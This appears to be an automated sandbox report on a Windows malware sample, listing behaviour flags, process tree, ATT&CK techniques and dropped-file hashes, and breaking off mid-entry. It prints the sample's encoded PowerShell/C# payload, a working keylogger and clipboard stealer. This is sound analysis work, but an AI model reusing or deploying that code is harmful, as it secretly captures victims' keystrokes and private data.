UAZwBhAHQAZQAgAHUAaQBuAHQAIABwADYAKABJAG4AdABQAHQAcgAgAHAAUABhAHIAYQBtACkAOwBwAHUAYgBsAGkAYwAgAGQAZQBsAGUAZwBhAHQAZQAgAHYAbwBpAGQAIABiADEAMAAoACkAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABJAG4AdABQAHQAcgAgAGgANQAoAGkAbgB0ACAAawA0ADgALAAgAEkAbgB0AFAAdAByACAAaAA0ADkALAAgAEkAbgB0AFAAdAByACAAbAA1ADAAKQB7AGkAZgAgACgAawA0ADgAIAA+AD0AIAAwACAAJgAmACAAaAA0ADkAIAA9AD0AIAAoAEkAbgB0AFAAdAByACkAMAB4ADAAMQAwADAAKQB7AGkAbgB0ACAAbQA1ADEAIAA9ACAAZQA0ADYAKABsADUAMAApADsAaQBmACAAKABtADUAMQAgADwAIAA4ACkAIAByAGUAdAB1AHIAbgAgAEMAYQBsAGwATgBlAHgAdABIAG8AbwBrAEUAeAAoAG8AOQAsACAAawA0ADgALAAgAGgANAA5ACwAIABsADUAMAApADsAZwAxADEAKAApADsAYgBvAG8AbAAgAG0ANQAyACAAPQAgACgAbQA1ADEAIAA9AD0AIAA4ACkAOwBiAG8AbwBsACAAaQA1ADMAIAA9ACAAKABtADUAMQAgAD0APQAgADQANgApADsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGcANQA0ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoACkAOwBiAHkAdABlAFsAXQAgAGMANQA1ACAAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAMgA1ADUAXQA7AGkAZgAgACgARwBlAHQASwBlAHkAYgBvAGEAcgBkAFMAdABhAHQAZQAoAGMANQA1ACkAKQB7AHUAaQBuAHQAIABsADUANgAgAD0AIABNAGEAcABWAGkAcgB0AHUAYQBsAEsAZQB5ACgAbQA1ADEALAAgADMAKQA7AGUAMQAyACAAPQAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAdQBpAG4AdAAgAGsANQA3ACAAPQAgADAAOwB1AGkAbgB0ACAAZQA1ADgAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKABlADEAMgAsACAAcgBlAGYAIABrADUANwApADsAdQBpAG4AdAAgAGsANQA5ACAAPQAgAEcAZQB0AEsAZQB5AGIAbwBhAHIAZABMAGEAeQBvAHUAdAAoAGUANQA4ACkAOwBpAGYAIAAoAG0ANQAyACAAfAB8ACAAaQA1ADMAIAB8AHwAIAAoAFQAbwBVAG4AaQBjAG8AZABlAEUAeAAoAG0ANQAxACwAIABsADUANgAsACAAYwA1ADUALAAgAGcANQA0ACwAIABnADUANAAuAEMAYQBwAGEAYwBpAHQAeQAsACAAKAB1AGkAbgB0ACkAMAAsACAAawA1ADkAKQAgAD4AIAAwACkAKQB7AGkAbgB0ACAAbQAzADcAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAGUAMQAyACkAOwBmADEANQAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKABtADMANwAgACsAIAAxACkAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAZQAxADIALAAgAGYAMQA1ACwAIABtADMANwAgACsAIAAxACkAOwBpAGYAIAAoACgAawA1ADcAIAAhAD0AIABjADEANAApACAAfAB8ACAAKABlADEAMgAgACEAPQAgAGgAMQAzACkAIAB8AHwAIAAoAGgAMQA2AC4AVABvAFMAdAByAGkAbgBnACgAKQAgACEAPQAgAGYAMQA1AC4AVABvAFMAdAByAGkAbgBnACgAKQApACkAewBmADQAMQAoAGgAMQA2ACwAIABpADIANQAsACAAZgAxADcAKQA7AGgAMQA2AC4AUgBlAG0AbwB2AGUAKAAwACwAIABoADEANgAuAEwAZQBuAGcAdABoACkAOwBoADEANgAuAEEAcABwAGUAbgBkACgAZgAxADUAKQA7AGYAMQA3AC4AUgBlAG0AbwB2AGUAKAAwACwAIABmADEANwAuAEwAZQBuAGcAdABoACkAOwBoADEAMwAgAD0AIABlADEAMgA7AFAAcgBvAGMAZQBzAHMAIABnADMAOAAgAD0AIABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAUAByAG8AYwBlAHMAcwBCAHkASQBkACgAKABpAG4AdAApAGsANQA3ACkAOwBpAGYAIAAoAGcAMwA4ACAAIQA9ACAAbgB1AGwAbAApACAAaQAyADUAIAA9ACAAZwAzADgALgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwAgAGUAbABzAGUAIABpADIANQAgAD0AIAAiACIAOwBjADEANAAgAD0AIABrADUANwA7AH0AaQBmACAAKABtADUAMQAgAD4AIAA3ACkAewBpAGYAIAAoAG0ANQAyACkAIABmADEANwAuAEEAcABwAGUAbgBkACgAIgBbAKsAXQAiACkAOwBlAGwAcwBlACAAaQBmACAAKABpADUAMwApACAAZgAxADcALgBBAHAAcABlAG4AZAAoACIAWwBkAGUAbABdACIAKQA7AGUAbABzAGUAIABmADEANwAuAEEAcABwAGUAbgBkACgAZwA1ADQAKQA7AH0AfQB9AH0AcgBlAHQAdQByAG4AIABDAGEAbABsAE4AZQB4AHQASABvAG8AawBFAHgAKABvADkALAAgAGsANAA4ACwAIABoADQAOQAsACAAbAA1ADAAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AIABiADYAMAAoAGIAeQB0AGUAWwBdACAAbAA2ADEAKQB7AHMAdAByAGkAbgBnACAAZAA2ADIAIAA9ACAARQBuAGMAbwBkAGkAbgBnAC4AQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABsADYAMQApADsAaQBmACAAKABzAHQAcgBpAG4AZwAuAEkAcwBOAHUAbABsAE8AcgBFAG0AcAB0AHkAKABkADYAMgApACkAIAByAGUAdAB1AHIAbgAgAG4AZQB3ACAATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AKAApADsAcgBlAHQAdQByAG4AIABuAGUAdwAgAEwAaQBzAHQAPABzAHQAcgBpAG4AZwA+ACgAZAA2ADIALgBTAHAAbABpAHQAKABuAGUAdwAgAGMAaABhAHIAWwBdACAAewAgACcAXAAwACcAIAB9ACwAIABTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwAuAFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGsAOAAoAEkAbgB0AFAAdAByACAAagA2ADMAKQB7AGIAbwBvAGwAIABrADYANAAgAD0AIAB0AHIAdQBlADsAcwB0AHIAaQBuAGcAIABuADYANQA7AFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABqADYANgAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKAApADsAdwBoAGkAbABlACAAKABrADYANAApAHsAcwB0AHIAaQBuAGcAIABjADYANwAgAD0AIABSAGUAZwBpAHMAdAByAHkALgBHAGUAdABWAGEAbAB1AGUAKABnADIAMAAsACAAZwAyADMALAAgACIAIgApAC4AVABvAFMAdAByAGkAbgBnACgAKQA7AGkAZgAgACgAYwA2ADcAIAAhAD0AIAAiACIAKQB7AFIAZQBnAGkAcwB0AHIAeQBLAGUAeQAgAGMANgA4ACAAPQAgAFIAZQBnAGkAcwB0AHIAeQAuAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAuAE8AcABlAG4AUwB1AGIASwBlAHkAKABwADEAOQAsACAAdAByAHUAZQApADsAaQBmACAAKABjADYAOAAgACEAPQAgAG4AdQBsAGwAKQB7AGMANgA4AC4ARABlAGwAZQB0AGUAVgBhAGwAdQBlACgAZwAyADMAKQA7AGMANgA4AC4AQwBsAG8AcwBlACgAKQA7AH0ARQB4AGkAdABQAHIAbwBjAGUAcwBzACgAMAApADsAfQBpAGYAIAAoAEMAbABpAHAAYgBvAGEAcgBkAC4AQwBvAG4AdABhAGkAbgBzAFQAZQB4AHQAKAApACAAPQA9ACAAdAByAHUAZQApAHsAbgA2ADUAIAA9ACAAQwBsAGkAcABiAG8AYQByAGQALgBHAGUAdABUAGUAeAB0ACgAKQA7AGkAZgAgACgAbgA2ADUAIAAhAD0AIABkADEAOAApAHsAcwB0AHIAaQBuAGcAIABhADYAOQAgAD0AIAAiACIAOwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAcAA3ADAAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AGUAMQAyACAAPQAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAaQBmACAAKABlADEAMgAgACEAPQAgADAAKQB7AGkAbgB0ACAAbQAzADcAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAGUAMQAyACkAOwBwADcAMAAuAEMAYQBwAGEAYwBpAHQAeQAgAD0AIABtADMANwAgACsAIAAxADsARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdAAoAGUAMQAyACwAIABwADcAMAAsACAAbQAzADcAIAArACAAMQApADsAdQBpAG4AdAAgAF8AcAByAG8AYwBfAGkAZABfACAAPQAgADAAOwBpAGYAIAAoAEcAZQB0AFcAaQBuAGQAbwB3AFQAaAByAGUAYQBkAFAAcgBvAGMAZQBzAHMASQBkACgAZQAxADIALAAgAHIAZQBmACAAXwBwAHIAbwBjAF8AaQBkAF8AKQAgACEAPQAgADAAKQB7AFAAcgBvAGMAZQBzAHMAIABrADcAMQAgAD0AIABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAUAByAG8AYwBlAHMAcwBCAHkASQBkACgAKABpAG4AdAApAF8AcAByAG8AYwBfAGkAZABfACkAOwBpAGYAIAAoAGsANwAxACAAIQA9ACAAbgB1AGwAbAApACAAYQA2ADkAIAA9ACAAawA3ADEALgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwB9AH0AcAA3ADAALgBBAHAAcABlAG4AZAAoACIAIAA6ADoAIABDAGwAaQBwAGIAbwBhAHIAZAAiACkAOwBqADYANgAuAFIAZQBtAG8AdgBlACgAMAAsACAAagA2ADYALgBMAGUAbgBnAHQAaAApADsAagA2ADYALgBBAHAAcABlAG4AZAAoAG4ANgA1ACkAOwBmADQAMQAoAHAANwAwACwAIABhADYAOQAsACAAagA2ADYAKQA7AGQAMQA4ACAAPQAgAG4ANgA1ADsAfQB9AHMAdAByAGkAbgBnACAAaQA3ADIAIAA9ACAAIgAiADsAbAAyADgAIABtADcAMwA7AGkAZgAgACgAbwAyADcAIAAhAD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AKQB7AHUAaQBuAHQAIABlADcANAAgAD0AIAAxADAAMAAwADAAOwBiAHkAdABlAFsAXQAgAGYANwA1ACAAPQAgAG4AZQB3ACAAYgB5AHQAZQBbAGUANwA0AF0AOwBpAGYAIAAoAFMAQwBhAHIAZABMAGkAcwB0AFIAZQBhAGQAZQByAHMAKABvADIANwAsACAAbgB1AGwAbAAsACAAZgA3ADUALAAgAG8AdQB0ACAAZQA3ADQAKQAgAD0APQAgADAAKQB7AEwAaQBzAHQAPABzAHQAcgBpAG4AZwA+ACAAagA3ADYAIAA9ACAAYgA2ADAAKABmADcANQApADsAaQBuAHQAIABuADcANwAgAD0AIABqADcANgAuAEMAbwB1AG4AdAA7AGkAZgAgACgAbgA3ADcAIAA+ACAAMAApAHsAaQBuAHQAIABuADcAOAAgAD0AIAAwADsAbAAyADgAWwBdACAAbwA3ADkAIAA9ACAAbgBlAHcAIABsADIAOABbAG4ANwA3AF0AOwBmAG8AcgBlAGEAYwBoACAAKABzAHQAcgBpAG4AZwAgAG4AOAAwACAAaQBuACAAagA3ADYAKQB7AG8ANwA5AFsAbgA3ADgAXQAuAGEAMgA5ACAAPQAgAG4AOAAwADsAbgA3ADgAKwArADsAfQBpAGYAIAAoAFMAQwBhAHIAZABHAGUAdABTAHQAYQB0AHUAcwBDAGgAYQBuAGcAZQAoAG8AMgA3ACwAIAA1ADAAMAAsACAAbwA3ADkALAAgAG8ANwA5AC4ATABlAG4AZwB0AGgAKQAgAD0APQAgADAAKQB7AGYAbwByACAAKABpAG4AdAAgAG4AOAAxACAAPQAgADAAOwAgAG4AOAAxACAAPAAgAG4ANwA3ADsAIABuADgAMQArACsAKQB7AG0ANwAzACAAPQAgAG8ANwA5AFsAbgA4ADEAXQA7AGkANwAyACAAKwA9ACAAbQA3ADMALgBhADIAOQA7AGkAZgAgACgAKABtADcAMwAuAGgAMwAyACAAJgAgADAAeAAwADAAMAAwADAAMAAyADAAKQAgACEAPQAgADAAKQAgAGkANwAyACAAKwA9ACAAIgAgAC0AIABmAG8AdQBuAGQAIgA7AGkANwAyACAAKwA9ACAAIgBcAHIAXABuACIAOwB9AH0AfQB9AH0AUgBlAGcAaQBzAHQAcgB5AC4AUwBlAHQAVgBhAGwAdQBlACgAZwAyADAALAAgAHAAMgAyACwAIABpADcAMgApADsAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwAuAFQAaAByAGUAYQBkAC4AUwBsAGUAZQBwACgAMQAwADAAMAApADsAfQByAGUAdAB1AHIAbgAgADAAOwB9AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFMAZQB0AFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKABpAG4AdAAgAGkAOAAyACwAIABwADMAIABtADgAMwAsACAASQBuAHQAUAB0AHIAIABsADgANAAsACAAdQBpAG4AdAAgAGQAOAA1ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFUAbgBoAG8AbwBrAFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKABJAG4AdABQAHQAcgAgAGcAOAA2ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAGEAbABsAE4AZQB4AHQASABvAG8AawBFAHgAKABJAG4AdABQAHQAcgAgAGcAOAA2ACwAIABpAG4AdAAgAGsANAA4ACwAIABJAG4AdABQAHQAcgAgAGgANAA5ACwAIABJAG4AdABQAHQAcgAgAGwANQAwACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQATQBvAGQAdQBsAGUASABhAG4AZABsAGUAKABzAHQAcgBpAG4AZwAgAGUAOAA3ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAE0AYQBwAFYAaQByAHQAdQBhAGwASwBlAHkAKABpAG4AdAAgAGsAOAA4ACwAIAB1AGkAbgB0ACAAZQA4ADkAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAARwBlAHQASwBlAHkAYgBvAGEAcgBkAEwAYQB5AG8AdQB0ACgAdQBpAG4AdAAgAG4AOQAwACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFQAbwBVAG4AaQBjAG8AZABlAEUAeAAoAGkAbgB0ACAAYgA5ADEALAAgAHUAaQBuAHQAIABrADkAMgAsACAAYgB5AHQAZQBbAF0AIABqADkAMwAsACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGkAOQA0ACwAIABpAG4AdAAgAGgAOQA1ACwAIAB1AGkAbgB0ACAAZQA5ADYALAAgAHUAaQBuAHQAIABhADkANwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABHAGUAdABLAGUAeQBiAG8AYQByAGQAUwB0AGEAdABlACgAYgB5AHQAZQBbAF0AIABtADkAOAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACgAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKAB1AGkAbgB0ACAAbgA5ADkALAAgAHIAZQBmACAAdQBpAG4AdAAgAGEAMQAwADAAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEcAZQB0AFcAaQBuAGQAbwB3AFQAZQB4AHQATABlAG4AZwB0AGgAKAB1AGkAbgB0ACAAawAxADAAMQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAdQBpAG4AdAAgAGsAMQAwADEALAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABuADEAMAAyACwAIABpAG4AdAAgAGQAMQAwADMAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABjADEAMAA0ACwAIAB1AGkAbgB0ACAAbwAxADAANQAsACAAcAA2ACAAZQAxADAANgAsACAASQBuAHQAUAB0AHIAIABpADEAMAA3ACwAIAB1AGkAbgB0ACAAZQAxADAAOAAsACAASQBuAHQAUAB0AHIAIABlADEAMAA5ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABFAHgAaQB0AFAAcgBvAGMAZQBzAHMAKAB1AGkAbgB0ACAAawAxADEAMAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIAB1AGkAbgB0ACAAQwByAGUAYQB0AGUATQB1AHQAZQB4ACgASQBuAHQAUAB0AHIAIABqADEAMQAxACwAIABiAG8AbwBsACAAcAAxADEAMgAsACAAcwB0AHIAaQBuAGcAIABlADEAMQAzACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABPAHAAZQBuAE0AdQB0AGUAeAAoAHUAaQBuAHQAIABoADEAMQA0ACwAIABiAG8AbwBsACAAYgAxADEANQAsACAAcwB0AHIAaQBuAGcAIABlADEAMQAzACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB3AGkAbgBzAGMAYQByAGQALgBkAGwAbAAiACkAXQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUwBDAGEAcgBkAEUAcwB0AGEAYgBsAGkAcwBoAEMAbwBuAHQAZQB4AHQAKABJAG4AdAAzADIAIABrADEAMQA2ACwAIABJAG4AdABQAHQAcgAgAG0AMQAxADcALAAgAEkAbgB0AFAAdAByACAAYQAxADEAOAAsACAAbwB1AHQAIABJAG4AdABQAHQAcgAgAGkAMQAxADkAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAHcAaQBuAHMAYwBhAHIAZAAuAGQAbABsACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAIAA9ACAAIgBTAEMAYQByAGQATABpAHMAdABSAGUAYQBkAGUAcgBzAEEAIgAsACAAQwBoAGEAcgBTAGUAdAAgAD0AIABDAGgAYQByAFMAZQB0AC4AQQBuAHMAaQApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFMAQwBhAHIAZABMAGkAcwB0AFIAZQBhAGQAZQByAHMAKABJAG4AdABQAHQAcgAgAGkAMQAxADkALAAgAGIAeQB0AGUAWwBdACAAbAAxADIAMAAsACAAYgB5AHQAZQBbAF0AIABlADEAMgAxACwAIABvAHUAdAAgAFUASQBuAHQAMwAyACAAbwAxADIAMgApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdwBpAG4AcwBjAGEAcgBkAC4AZABsAGwAIgApAF0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFMAQwBhAHIAZABHAGUAdABTAHQAYQB0AHUAcwBDAGgAYQBuAGcAZQAoAEkAbgB0AFAAdAByACAAaQAxADEAOQAsACAAVQBJAG4AdAAzADIAIABoADEAMgAzACwAIABbAEkAbgAsACAATwB1AHQAXQAgAGwAMgA4AFsAXQAgAG8ANwA5ACwAIABJAG4AdAAzADIAIABlADEAMgA0ACkAOwB9AH0ADQAKACIAQAAgAC0AUgBlAGYAZQByAGUAbgBjAGUAZABBAHMAcwBlAG0AYgBsAGkAZQBzACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAWwBjADEALgBtADIAXQA6ADoAUgB1AG4AKAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBjAG8AbgBzAG8AbABlAF0AOgA6AEMAYQBwAHMATABvAGMAawAgAH0AIAApAA==
1⤵
- Process spawned unexpected child process
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2976
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0hbjkxcw.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2576
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8586.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8585.tmp"
    3⤵
    PID:976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
e4151abe12128d76c3834fdb61e1dd74

SHA1
f603140a70af22cb08c3478ca5f048d22b77b397

SHA256
f59de425d1affddb78e9d1fb2335092ec6ecf2a258b3ba0c87e97155009bdaf1

SHA512
d9c2c6aac34cabaabda528f1eb654a83a36f1d256f519f914bfe25b5b6cd61eaf6d420371e2eadf808233e133d6e42a8a50868b2339edd6a36eb5d74fd6f222d

Download Submit
C:\Users\Admin\AppData\Local\Temp\0hbjkxcw.dll

Filesize
10KB

MD5
455332f91b55da6306f21702d99ba450

SHA1
780b5d2d23e5e9a0d89ac456dc895112478467ff

SHA256
55c22710d1a1905d72afb3327d72ab995c0e8a91a49e81cbebf01840d586c9e6

SHA512
ef650b6e0b0ea8eaa09865b46f2aeba5a5a94bb0488695c6d378908a5c200f0155091539523e53c747a98a6acb572fe1a56a1a5ff0658bac06697841e5b93b5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\0hbjkxcw.pdb

Filesize
17KB

MD5
b0340ab2326d2891236db46587f91d8b

SHA1
de2457833239ed5377675130b7b495e3c004ec07

SHA256
7684b49b3c76c984b7d46a22bac5afe8106b5108a241360cb44130bedffa237b

SHA512
8785b8465212f8ad5e02b726cf3845ab3495ef087e015835803070a59423dbcb567100f7f27d9dcfa0c3188d75129c738d35b953969ae2e71392e865316148d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\3213331264

Filesize
41KB

MD5
c4d2d117803c4f2a631087eb2ade30a6

SHA1
ff32d1b965a2f5956639b6540e5c2d15e7f289d9

SHA256
375e8265900a3c4acebd38bdcd959efa80ccc73a47003eef7b6fc019bfd118c8

SHA512
ae85c1b6f948cf298ae498b653ee3435a96b4dd1cde65f0edb426b8c0d596f14b6bc8c5b7598278e6779f1b38f2158ade30b9dbba7c9b0dad04fb83c616b1ab7

Download Submit
C:\Users\Admin\AppData\Local\Temp\445113777

Filesize
56KB

MD5
cb0b3aa58373b87e080e433a5574ad8f

SHA1
361eee36a9f713a6137379eae1b2367ac8de4656

SHA256
5675cbadab71a1c16bd15be57cc29fc3f67a73ba16efa6d7fd239dba849cd240

SHA512
3a5e893956aa54c213bb79a6a669c4f379b47a892eedd618e58cebf26eacf24b4470c04394d585e91d6bcbd0a9865ca6c98d18a9597cf9d6177a64b733c9ad44

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab83D2.tmp

Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8586.tmp

Filesize
1KB

MD5
80b257b7b772d58a84f323ab7e7649b2

SHA1
e1e7759c8fca30d1b6bc09d714ae01513f27422d

SHA256
6fb04defbf4e268bdcbace04638a274f6c9f7c094a91adac72595c5ff416aeb9

SHA512
79f8ed60d2ff35933566fef4fa5d68854bef4ea6bca6aaf92db0226e8f7e8baff9b7e5f2c84c23d782286729ec45210a32b908e0860c042a34528f78c9efaed9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar8452.tmp

Filesize
164KB

MD5
4ff65ad929cd9a367680e0e5b1c08166

SHA1
c0af0d4396bd1f15c45f39d3b849ba444233b3a2

SHA256
